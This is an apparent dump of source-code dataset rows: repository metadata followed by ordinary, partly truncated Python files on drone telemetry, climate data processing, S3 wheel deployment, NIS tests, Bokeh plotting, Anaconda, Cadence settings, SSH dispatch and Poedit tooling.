self.ekf_ok = False
self.gps_fix = 3
self.gps_sat = 10
self.gps_eph = 100
self.gps_epv = 200
self.set_global_alt = True
self.set_attitude = True
self.mode = "AUTO"
self.global_alt = 10
self.global_lat = -35.3632086902
self.global_lon = 149.165274916
self.distance_from_self = None
self.mission_importance = 0
self.heading = 300 #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = 100 #percentage
self.velocity = [0.5, -3.1, 0.7] #m/s, airspeed
self.groundspeed = 3.46 #m/s
self.airspeed = 3.46 #m/s
self.system_status = "OK"
else:
self.ID = uuid.uuid4().int #Random UUID
self.last_recv = None
self.version = vehicle.version.release_version()
self.ekf_ok = vehicle.ekf_ok
self.gps_fix = vehicle.gps_0.fix_type
self.gps_sat = vehicle.gps_0.satellites_visible
self.gps_eph = vehicle.gps_0.eph
self.gps_epv = vehicle.gps_0.epv
self.set_global_alt = vehicle.capabilities.set_altitude_target_global_int
self.set_attitude = vehicle.capabilities.set_attitude_target
self.mode = vehicle.mode.name
self.global_alt = vehicle.location.global_relative_frame.alt
self.global_lat = vehicle.location.global_relative_frame.lat
self.global_lon = vehicle.location.global_relative_frame.lon
self.distance_from_self = None
self.mission_importance = 0 #default, for hobbyists and recreation
self.heading = vehicle.heading #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = vehicle.battery.level #percentage
self.velocity = vehicle.velocity #m/s, airspeed
self.groundspeed = vehicle.groundspeed #m/s
self.airspeed = vehicle.airspeed #m/s
self.system_status = vehicle.system_status.state
self.add_listeners(network, vehicle)
def add_listeners(self, network, vehicle):
"""
The function to observe updated values. These values must be contained in the params class
and a networking scheme (through drone_network) must be active.
Object vehicle can be accessed through network.vehicle but it is an input for
the correct syntax of python's decorator functions.
Any observers here are implemented based on the tutorial found in:
http://python.dronekit.io/automodule.html#dronekit.Locations.on_attribute
Some of the values pass through thresholding so as to limit writes.
Thresholding is done based on experience and needs
"""
if network == None:
print "No listeners added due to unknown network"
return
#State of System (Initializing, Emergency, etc.)
@vehicle.on_attribute('system_status')
def decorated_system_status_callback(self, attr_name, value):
network.vehicle_params.system_status = value.state
print 'System status changed to: ', network.vehicle_params.system_status
#Battery information
@vehicle.on_attribute('battery')
def decorated_battery_callback(self, attr_name, value):
if network.vehicle_params.battery_level == value.level:
pass
else:
network.vehicle_params.battery_level = value.level
#print 'Battery level: ', network.vehicle_params.battery_level
#Velocity information (m/s)
#return velocity in all three axis
@vehicle.on_attribute('velocity')
def decorated_velocity_callback(self, attr_name, value):
if network.vehicle_params.velocity == value:
pass
else:
network.vehicle_params.velocity = value
#print 'Velocity changed to:\n', network.vehicle_params.velocity, ' m/s'
"""
Airspeed and groundspeed are exactly the same in the simulation but
this is not applicable in real-life scenarios.
Tolerance is added to cm scale
Return: speed (m/s)
"""
@vehicle.on_attribute('airspeed')
def decorated_airspeed_callback(self, attr_name, value):
if network.vehicle_params.airspeed == round(value, 2):
pass
else:
network.vehicle_params.airspeed = round(value, 2)
#print 'Airspeed changed to: ', network.vehicle_params.airspeed, ' m/s'
@vehicle.on_attribute('groundspeed')
def decorated_groundspeed_callback(self, attr_name, value):
if network.vehicle_params.groundspeed == round(value, 2):
pass
else:
network.vehicle_params.groundspeed = round(value, 2)
#print 'Groundspeed changed to: ', network.vehicle_params.groundspeed, ' m/s'
#State of EKF
#return: True/False
@vehicle.on_attribute('vehicle.ekf_ok')
def decorated_ekf_ok_callback(self, attr_name, value):
network.vehicle_params.ekf_ok = value
print 'EKF availability changed to: ', network.vehicle_params.ekf_ok
#GPS-related info
#return: .eph (HDOP) .epv (VDOP) .fix_type .satellites_visible
@vehicle.on_attribute('vehicle.gps_0')
|
def decorated_gps_callback(self, attr_name, value):
network.vehicle_params.gps_fix = value.fix_type
network.vehicle_params.gps_sat = value.satellites_visible
network.vehicle_params.gps_eph = value.eph
network.vehicle_params.gps_epv = value.epv
print 'GPSInfo changed to:\nFix:', network.vehicle_params.gps_fix, \
'\nSatellites:', network.vehicle_params.gps_sat, '\nEPH:', network.vehicle_params.gps_eph, \
'\nEPV: ', network.vehicle_params.gps_epv
|
#Set altitude offboard
#return: True/False
@vehicle.on_attribute('set_altitude_target_global_int')
def decorated_set_global_altitude_callback(self, attr_name, value):
network.vehicle_params.set_global_alt = value
print 'Ability to set global altitude changed to: ', network.vehicle_params.set_global_alt
#Set attitude offboard
#return: True/False
@vehicle.on_attribute('set_attitude_target')
def decorated_set_attitude_callback(self, attr_name, value):
network.vehicle_params.set_attitude = value
print 'Ability to set attitude changed to: ', network.vehicle_params.set_attitude
#Flying mode
@vehicle.on_attribute('mode')
def decorated_mode_callback(self, attr_name, value):
network.vehicle_params.mode = value.name
print 'Mode changed to: ', network.vehicle_params.mode
"""
A precision of 7 decimal digits in lat/lon degrees is satisfactory.
Tolerance of 7 decimal digits in degrees equals about 11 millimetres (1 degree of latitude is roughly 111 km, so 1e-7 degrees is about 11 mm).
http://gis.stackexchange.com/questions/8650/how-to-measure-the-accuracy-of-latitude-and-longitude
Returns: altitude (
|
pygeo/pycmbs
|
pycmbs/benchmarking/models/cmip5.py
|
Python
|
mit
| 20,505
| 0.003755
|
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import ast
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
from pycmbs.utils import print_log, WARNING
class CMIP5Data(Model):
"""
Class for CMIP5 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir : str
directory that specifies the root directory where the data is located
model : TBD todo
experiment : str
specifies the ID of the experiment
dic_variables : TODO
name : str
name of model
shift_lon : bool
specifies if longitudes of data need to be shifted
kwargs : dict
other keyword arguments
"""
if name == '':
name = model
super(CMIP5Data, self).__init__(data_dir, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
Returns
-------
string with unique combination of models and experiment
"""
s = self.model.replace(' ', '') + '-' + self.experiment.replace(' ', '')
s = s.replace('#', '-')
if hasattr(self, 'ens_member'):
s += '-' + str(self.ens_member)
return s
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_wind(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_evaporation(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_latent_heat_flux(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_model_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print ''
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
assert False
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
# no defaults; everything should be explicitly specified in either the config file or the dictionaries
varname = locdict.pop('variable', None)
#~ print self.type
#~ print locdict.keys()
assert varname is not None, 'ERROR: provide varname!'
units = locdict.pop('unit', None)
assert units is not None, 'ERROR: provide unit!'
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
model_suffix = locdict.pop('model_suffix', None)
model_prefix = locdict.pop('model_prefix', None)
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if custom_path is None:
filename1 = self.get_raw_filename(varname, **kwargs)  # routine needs to be implemented by each subclass
|
else:
filename1 = custom_path + self.get_raw_filename(varname, **kwargs)
if filename1 is None:
print_log(WARNING, 'No valid model input data')
return None
force_calc = False
if self.start_time is None:
|
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=l
|
metaml/nupic.core
|
ci/travis/deploy-wheel-to-s3.py
|
Python
|
agpl-3.0
| 1,831
| 0.0071
|
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013-5, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import os
import sys
import boto
from boto.s3.key import Key
# This script assumes the following environment variables are set for boto:
# - AWS_ACCESS_KEY_ID
# - AWS_SECRET_ACCESS_KEY
REGION = "us-west-2"
BUCKET = "artifacts.numenta.org"
RELEASE_FOLDER = "numenta/nupic.core/releases/nupic.bindings"
|
def upload(artifactsBucket, wheelFileName, wheelPath):
key = Key(artifactsBucket)
key.key = "%s/%s" % (RELEASE_FOLDER, wheelFileName)
print "Uploading %s to %s/%s..." % (wheelFileName, BUCKET, RELEASE_FOLDER)
key.set_contents_from_filename(wheelPath)
def run(wheelPath):
wheelFileName = os.path.basename(wheelPath)
conn = boto.connect_s3()
artifactsBucket = conn.get_bucket(BUCKET)
upload(artifactsBucket, wheelFileName, wheelPath)
if __name__ == "__main__":
wheelPath = sys.argv[1]
|
run(wheelPath)
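# Hypothetical invocation (a sketch, not part of the original script); requires
# AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY to be exported in the environment:
#   python deploy-wheel-to-s3.py dist/nupic.bindings-<version>-py2-none-any.whl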
|
j5shi/Thruster
|
pylibs/test/test_nis.py
|
Python
|
gpl-2.0
| 1,215
| 0.003292
|
from test import test_support
import unittest
nis = test_support.import_module('nis')
class NisTests(unittest.TestCase):
def test_maps(self):
try:
maps = nis.maps()
except nis.error, msg:
# NIS is probably not active, so this test isn't useful
self.skipTest(str(msg))
try:
# On some systems, this map is only accessible to the
# super user
maps.remove("passwd.adjunct.byname")
except ValueError:
pass
done = 0
for nismap in maps:
|
mapping = nis.cat(nismap)
for k, v in mapping.items():
if not k:
continue
if nis.match(k, nismap) != v:
self.fail("NIS match failed for key `%s' in map `%s'" % (k, nismap))
else:
# just test the one key, otherwise this test could take a
# very long time
done = 1
break
if done:
|
break
def test_main():
test_support.run_unittest(NisTests)
if __name__ == '__main__':
test_main()
|
the13fools/Bokeh_Examples
|
glyphs/anscombe.py
|
Python
|
bsd-3-clause
| 3,251
| 0.021839
|
from __future__ import print_function
import numpy as np
import pandas as pd
from bokeh.browserlib import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.glyphs import Circle, Line
from bokeh.objects import (
ColumnDataSource, Glyph, Grid, GridPlot, LinearAxis, Plot, Range1d
)
from bokeh.resources import INLINE
raw_columns=[
[10.0, 8.04, 10.0, 9.14, 10.0, 7.46, 8.0, 6.58],
[8.0, 6.95, 8.0, 8.14, 8.0, 6.77, 8.0, 5.76],
[13.0, 7.58, 13.0, 8.74, 13.0, 12.74, 8.0, 7.71],
[9.0, 8.81, 9.0, 8.77, 9.0, 7.11, 8.0, 8.84],
[11.0, 8.33, 11.0, 9.26, 11.0, 7.81, 8.0, 8.47],
[14.0, 9.96, 14.0, 8.10, 14.0, 8.84, 8.0, 7.04],
[6.0, 7.24, 6.0, 6.13, 6.0, 6.08, 8.0, 5.25],
[4.0, 4.26, 4.0, 3.10, 4.0, 5.39, 19.0, 12.5],
[12.0, 10.84, 12.0, 9.13, 12.0, 8.15, 8.0, 5.56],
[7.0, 4.82, 7.0, 7.26, 7.0, 6.42, 8.0, 7.91],
[5.0, 5.68, 5.0, 4.74, 5.0, 5.73, 8.0, 6.89]]
quartet = pd.DataFrame(data=raw_columns, columns=
['Ix','Iy','IIx','IIy','IIIx','IIIy','IVx','IVy'])
circles_source = ColumnDataSource(
data = dict(
xi = quartet['Ix'],
yi = quartet['Iy'],
xii = quartet['IIx'],
yii = quartet['IIy'],
xiii = quartet['IIIx'],
yiii = quartet['IIIy'],
xiv = quartet['IVx'],
yiv = quartet['IVy'],
)
)
x = np.linspace(-0.5, 20.5, 10)
y = 3 + 0.5 * x
lines_source = ColumnDataSource(data=dict(x=x, y=y))
xdr = Range1d(start=-0.5, end=20.5)
ydr = Range1d(start=-0.5, end=20.5)
def make_plot(title, xname, yname):
plot = Plot(
x_range=xdr, y_range=ydr, data_sources=[lines_source, circles_source],
title=title, plot_width=400, plot_height=400, border_fill='white', background_fill='#e9e0db')
xaxis = LinearAxis(plot=plot, dimension=0, location="bottom", axis_line_color=None)
yaxis = LinearAxis(plot=plot, dimension=1, location="left", axis_line_color=None)
xgrid = Grid(plot=plot, dimension=0, axis=xaxis)
ygrid = Grid(plot=plot, dimension=1, axis=yaxis)
line_renderer = Glyph(
data_source = lines_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Line(x='x', y='y', line_color="#666699", line_width=2),
)
plot.renderers.append(line_renderer)
circle_renderer = Glyph(
data_source = circles_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Circle(x=xname, y=yname, size=12, fill_color="#cc6633",
line_color="#cc6633", fill_alpha=0.5),
)
plot.renderers.append(circle_renderer)
return plot
#where will this comment show up
I = make_plot('I', 'xi', 'yi')
II = make_plot('II', 'xii', 'yii')
|
III = make_plot('III', 'xiii', 'yiii')
IV = make_plot('IV', 'xiv', 'yiv')
grid = GridPlot(children=[[I, II], [III, IV]], plot_width=800)
doc = Document( )
doc.add(grid)
if __name__ == "__main__":
|
filename = "anscombe.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Anscombe's Quartet"))
print("Wrote %s" % filename)
view(filename)
|
atodorov/anaconda
|
pyanaconda/modules/payloads/source/source_base_interface.py
|
Python
|
gpl-2.0
| 1,817
| 0.001101
|
#
# Base object of all payload sources.
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
|
#
from abc import ABCMeta
from dasbus.server.interface import dbus_interface
from dasbus.typing import * # pylint: disable=wildcard-import
from pyanaconda.modules.common.base.base_template import ModuleInterfaceTemplate
from pyanaconda.modules.common.constants.interfaces import PAYLOAD_SOURCE
@dbus_interface(PAYLOAD_SOURCE.interface_name)
class PayloadSourceBaseInterface(ModuleInterfaceTemplate, metaclass=ABCMeta):
|
"""Base class for all the payload source module interfaces.
This object contains API shared by all the sources. Everything in this object has
to be implemented by a source to be used.
"""
@property
def Type(self) -> Str:
"""Get the type of this source.
Possible values are:
- LIVE_OS_IMAGE
"""
return self.implementation.type.value
|
falkTX/Cadence
|
src/shared_settings.py
|
Python
|
gpl-2.0
| 12,056
| 0.004728
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Common/Shared code related to the Settings dialog
# Copyright (C) 2010-2018 Filipe Coelho <falktx@falktx.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
|
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the COPYING file
# ------------------------------------------------------------------------------------------------------------
# Imports (Global)
if True:
from PyQt5.QtCore import pyqtSlot, QSettings
from PyQt5.QtWidgets import QDialog, QDialogButtonBox
else:
from PyQt4.QtCore import pyqtSlot, QSettings
from PyQt4.QtGui import QDialog, QDialogButtonBox
# ------------------------------------------------------------------------------------------------------------
# Imports (Custom Stuff)
import ui_settings_app
from shared import *
from patchcanvas_theme import *
# ------------------------------------------------------------------------------------------------------------
# Global variables
# Tab indexes
TAB_INDEX_MAIN = 0
TAB_INDEX_CANVAS = 1
TAB_INDEX_LADISH = 2
TAB_INDEX_NONE = 3
# PatchCanvas defines
CANVAS_ANTIALIASING_SMALL = 1
CANVAS_EYECANDY_SMALL = 1
# LADISH defines
LADISH_CONF_KEY_DAEMON_NOTIFY = "/org/ladish/daemon/notify"
LADISH_CONF_KEY_DAEMON_SHELL = "/org/ladish/daemon/shell"
LADISH_CONF_KEY_DAEMON_TERMINAL = "/org/ladish/daemon/terminal"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART = "/org/ladish/daemon/studio_autostart"
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY = "/org/ladish/daemon/js_save_delay"
# LADISH defaults
LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT = True
LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT = "sh"
LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT = "x-terminal-emulator"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT = True
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY_DEFAULT = 0
# Internal defaults
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = HOME
# ------------------------------------------------------------------------------------------------------------
# Change internal defaults
def setDefaultProjectFolder(folder):
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = folder
# ------------------------------------------------------------------------------------------------------------
# Settings Dialog
class SettingsW(QDialog):
def __init__(self, parent, appName, hasOpenGL=False):
QDialog.__init__(self, parent)
self.ui = ui_settings_app.Ui_SettingsW()
self.ui.setupUi(self)
# -------------------------------------------------------------
# Set default settings
self.fRefreshInterval = 120
self.fAutoHideGroups = True
self.fUseSystemTray = True
self.fCloseToTray = False
# -------------------------------------------------------------
# Set app-specific settings
if appName == "catarina":
self.fAutoHideGroups = False
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_CANVAS, 0)
elif appName == "catia":
self.fUseSystemTray = False
self.ui.group_main_paths.setEnabled(False)
self.ui.group_main_paths.setVisible(False)
self.ui.group_tray.setEnabled(False)
self.ui.group_tray.setVisible(False)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
elif appName == "claudia":
self.ui.cb_jack_port_alias.setEnabled(False)
self.ui.cb_jack_port_alias.setVisible(False)
self.ui.label_jack_port_alias.setEnabled(False)
self.ui.label_jack_port_alias.setVisible(False)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
else:
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_CANVAS)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.stackedWidget.setCurrentIndex(TAB_INDEX_NONE)
return
# -------------------------------------------------------------
# Load settings
self.loadSettings()
# -------------------------------------------------------------
# Set-up GUI
if not hasOpenGL:
self.ui.cb_canvas_use_opengl.setChecked(False)
self.ui.cb_canvas_use_opengl.setEnabled(False)
self.ui.lw_page.item(0, 0).setIcon(getIcon(appName, 48))
self.ui.label_icon_main.setPixmap(getIcon(appName, 48).pixmap(48, 48))
# -------------------------------------------------------------
# Set-up connections
self.accepted.connect(self.slot_saveSettings)
self.ui.buttonBox.button(QDialogButtonBox.Reset).clicked.connect(self.slot_resetSettings)
self.ui.b_main_def_folder_open.clicked.connect(self.slot_getAndSetProjectPath)
def loadSettings(self):
settings = QSettings()
if not self.ui.lw_page.isRowHidden(TAB_INDEX_MAIN):
self.ui.le_main_def_folder.setText(settings.value("Main/DefaultProjectFolder", SETTINGS_DEFAULT_PROJECT_FOLDER, type=str))
self.ui.cb_tray_enable.setChecked(settings.value("Main/UseSystemTray", self.fUseSystemTray, type=bool))
self.ui.cb_tray_close_to.setChecked(settings.value("Main/CloseToTray", self.fCloseToTray, type=bool))
self.ui.sb_gui_refresh.setValue(settings.value("Main/RefreshInterval", self.fRefreshInterval, type=int))
self.ui.cb_jack_port_alias.setCurrentIndex(settings.value("Main/JackPortAlias", 2, type=int))
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_CANVAS):
self.ui.cb_canvas_hide_groups.setChecked(settings.value("Canvas/AutoHideGroups", self.fAutoHideGroups, type=bool))
self.ui.cb_canvas_bezier_lines.setChecked(settings.value("Canvas/UseBezierLines", True, type=bool))
self.ui.cb_canvas_eyecandy.setCheckState(settings.value("Canvas/EyeCandy", CANVAS_EYECANDY_SMALL, type=int))
self.ui.cb_canvas_use_opengl.setChecked(settings.value("Canvas/UseOpenGL", False, type=bool))
self.ui.cb_canvas_render_aa.setCheckState(settings.value("Canvas/Antialiasing", CANVAS_ANTIALIASING_SMALL, type=int))
self.ui.cb_canvas_render_hq_aa.setChecked(settings.value("Canvas/HighQualityAntialiasing", False, type=bool))
themeName = settings.value("Canvas/Theme", getDefaultThemeName(), type=str)
for i in range(Theme.THEME_MAX):
thisThemeName = getThemeName(i)
self.ui.cb_canvas_theme.addItem(thisThemeName)
if thisThemeName == themeName:
self.ui.cb_canvas_theme.setCurrentIndex(i)
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_LADISH):
self.ui.cb_ladish_notify.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_NOTIFY, LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT, type=bool))
self.ui.le_ladish_shell.setText(settings.value(LADISH_CONF_KEY_DAEMON_SHELL, LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT, type=str))
self.ui.le_ladish_terminal.setText(settings.value(LADISH_CONF_KEY_DAEMON_TERMINAL, LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT, type=str))
self.ui.cb_ladish_studio_autostart.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART, LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT, type=bool))
self.ui.sb_ladish_jsdelay.setValue(settings.value(LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY, LADISH_CONF_KEY_DAEMON_JS_S
|
lluxury/P_U_S_A
|
8_OS_Soup/code/dispatch1.py
|
Python
|
mit
| 297
| 0.016835
|
#!/usr/bin/env python
import subprocess
"""
A ssh based command dispatch system
"""
machines = ["10.0.1.40",
"10.0.1.50",
"10.0.1.51",
"10.0.1.60",
"10.0.1.80"]
cmd = "python /src/fing
|
erprint.py"
for machine in machines:
subprocess.call("ssh root@%s %s" % (machine, cmd), shell=True)
| |
vslavik/poedit
|
scripts/extract-fileviewer-mappings.py
|
Python
|
mit
| 3,349
| 0.008361
|
#!/usr/bin/env python3
# Generate the file-viewer extension -> highlighting-language mappings for
# src/fileviewer.extensions.h from the PrismJS components list and GitHub's
# language map (see PRISM_COMPONENTS_URL and LANGUAGE_MAP_URL below).
import os.path
import sys
import urllib.request
import re
import gettext
import json
import subprocess
from tempfile import TemporaryDirectory
import xml.etree.ElementTree as ET
PRISM_COMPONENTS_URL = 'https://github.com/PrismJS/prism/raw/master/components.json'
LANGUAGE_MAP_URL = 'https://github.com/blakeembrey/language-map/raw/master/languages.json'
# resolve ambiguities:
OVERRIDES = {
'h' : 'cpp',
'inc' : 'php',
'cake' : 'coffeescript',
'es' : 'javascript',
'fcgi' : 'lua',
'cgi' : 'perl',
'pl' : 'perl',
'pro' : 'perl',
'ts' : 'typescript',
'tsx' : 'typescript',
'sch' : 'scheme',
'cs' : 'csharp',
'st' : 'smalltalk',
}
# known irrelevant languages:
|
BLACKLIST = set([
'glsl', 'nginx', 'apacheconf', 'matlab', 'opencl', 'puppet', 'reason', 'renpy',
'plsql', 'sql', 'tex',
])
# ...and extensions:
BLACKLIST_EXT = set([
|
'spec', 'pluginspec', 'ml',
])
MARKER_BEGIN = "// Code generated with scripts/extract-fileviewer-mappings.py begins here"
MARKER_END = "// Code generated with scripts/extract-fileviewer-mappings.py ends here"
prism_langs = json.loads(urllib.request.urlopen(PRISM_COMPONENTS_URL).read().decode('utf-8'))['languages']
del prism_langs['meta']
language_map = json.loads(urllib.request.urlopen(LANGUAGE_MAP_URL).read().decode('utf-8'))
prism_known = {}
for lang, data in prism_langs.items():
prism_known[lang] = lang
for a in data.get('alias', []):
prism_known[a] = lang
ext_to_lang = {}
for lang, data in language_map.items():
lang = lang.lower()
lango = lang
if not lang in prism_known:
for a in data.get('aliases', []):
if a in prism_known:
lang = a
break
if lang not in prism_known:
continue
if lang in BLACKLIST:
continue
for ext in data.get('extensions', []):
assert ext[0] == '.'
ext = ext[1:].lower()
if ext in BLACKLIST_EXT:
continue
if ext != lang:
if ext in ext_to_lang:
if ext in OVERRIDES:
ext_to_lang[ext] = OVERRIDES[ext]
else:
sys.stderr.write(f'SKIPPING due to extension conflict: {ext} both {lang} and {ext_to_lang[ext]}\n')
ext_to_lang[ext] = lang
else:
ext_to_lang[ext] = lang
output = f'{MARKER_BEGIN}\n\n'
for ext in sorted(ext_to_lang.keys()):
lang = ext_to_lang[ext]
output += f'{{ "{ext}", "{lang}" }},\n'
output += f'\n{MARKER_END}\n'
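# The generated block then looks roughly like this (illustrative extensions only):
#   { "cc", "cpp" },
#   { "py", "python" },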
if os.path.isfile("src/fileviewer.extensions.h"):
outfname = "src/fileviewer.extensions.h"
else:
raise RuntimeError("run this script from project root directory")
with open(outfname, "rt") as f:
orig_content = f.read()
content = re.sub('%s(.*?)%s' % (MARKER_BEGIN, MARKER_END),
output,
orig_content,
0,
re.DOTALL)
with open(outfname, "wt") as f:
f.write(content)
print(output)
sys.stderr.write(f'Generated code written to {outfname}\n')
|
Danielhiversen/home-assistant
|
homeassistant/components/lutron_caseta/device_trigger.py
|
Python
|
apache-2.0
| 8,121
| 0.000739
